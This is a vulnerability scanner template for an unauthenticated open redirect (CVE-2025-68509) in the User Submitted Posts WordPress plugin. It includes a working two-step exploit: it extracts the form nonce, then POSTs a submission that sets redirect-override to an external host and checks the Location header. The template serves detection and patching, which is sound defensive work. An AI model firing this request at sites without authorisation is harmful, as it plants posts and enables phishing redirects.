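# Detection template for the redirect-override open redirect in the
# User Submitted Posts WordPress plugin (CVE-2025-68509).
#
# Two chained requests (see `flow`):
#   1. GET the base URL and extract the form's `usp-nonce` value.
#   2. POST a complete form submission with `redirect-override` set to an
#      external host, then check whether the Location header points there.
#
# Limitations a scan operator should know:
#   - Request 2 is a real form submission, so a successful run may leave a
#     submitted post on the target. The template is tagged `intrusive` so it
#     can be filtered out of read-only scans.
#   - The submission form must be rendered at {{BaseURL}}; sites that embed it
#     on another page are not detected.
#   - The captcha answer is hard-coded to 2; a site whose challenge expects a
#     different answer will be reported as not vulnerable (false negative).
id: CVE-2025-68509

info:
  name: User Submitted Posts <= 20251121 - Unauthenticated Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The User Submitted Posts plugin for WordPress is vulnerable to Open Redirect in all versions up to and including 20251121. This is due to insufficient validation on the redirect-override POST parameter. Unauthenticated attackers can redirect users to potentially malicious sites by tricking them into submitting a form.
  impact: |
    Attackers can redirect users to malicious sites, facilitating phishing attacks and credential theft.
  # The referenced changeset compares tag 20251121 with tag 20251210.
  remediation: |
    Update User Submitted Posts to a release newer than 20251121; the referenced changeset points to 20251210 as the release carrying the fix.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-submitted-posts/user-submitted-posts-20251121-unauthenticated-open-redirect
    - https://plugins.trac.wordpress.org/changeset?old_path=/user-submitted-posts/tags/20251121&new_path=/user-submitted-posts/tags/20251210
  classification:
    cve-id: CVE-2025-68509
    # CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="usp-nonce"
  tags: cve,cve2025,wordpress,wp-plugin,user-submitted-posts,open-redirect,wp,intrusive

# Random per-run values so repeated scans do not submit identical content.
variables:
  content: "{{to_lower(rand_text_alphanumeric(6))}}"
  username: "{{rand_text_alphanumeric(12)}}"
  email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"

# Request 2 only runs when request 1 found the form and extracted a nonce.
flow: http(1) && http(2)

http:
  # Request 1: confirm the plugin form is present and capture its nonce.
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 'name="usp-nonce"'
        internal: true

    extractors:
      - type: regex
        name: nonce
        part: body
        internal: true
        regex:
          - 'name="usp-nonce"\s+value="([^"]+)"'
        group: 1

  # Request 2: submit the form with an off-site redirect-override value.
  - method: POST
    path:
      - "{{BaseURL}}"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "usp-nonce={{nonce}}&user-submitted-title={{rand_int(10000,99999)}}&user-submitted-content={{content}}&user-submitted-name={{username}}&user-submitted-email={{email}}&user-submitted-url=https://test.com&user-submitted-tags=test&user-submitted-category[]=1&user-submitted-captcha=2&redirect-override=https://oast.live/"

    # Do not follow the redirect: the Location header itself is the evidence.
    redirects: false
    matchers:
      # Matches a Location header whose target is oast.live, with an optional
      # scheme (or scheme-relative / backslash variant) and an optional
      # userinfo or host prefix in front of it.
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.live\/?(\/|[^.].*)?$'
# NOTE: the digest below was generated for the template as originally
# published; any edit to the template invalidates it, so re-sign the file
# before relying on signature verification.
# digest: 490a0046304402204722a4bde44481a5fe3fdc1956ffae7809ba9a27bcd68c0a762f44197de500e8022030b24380c659812537791d4177f39a55d5c16426e0d8246ffa98408f739c98c8:922c64590222798bb761d5b6d8e72950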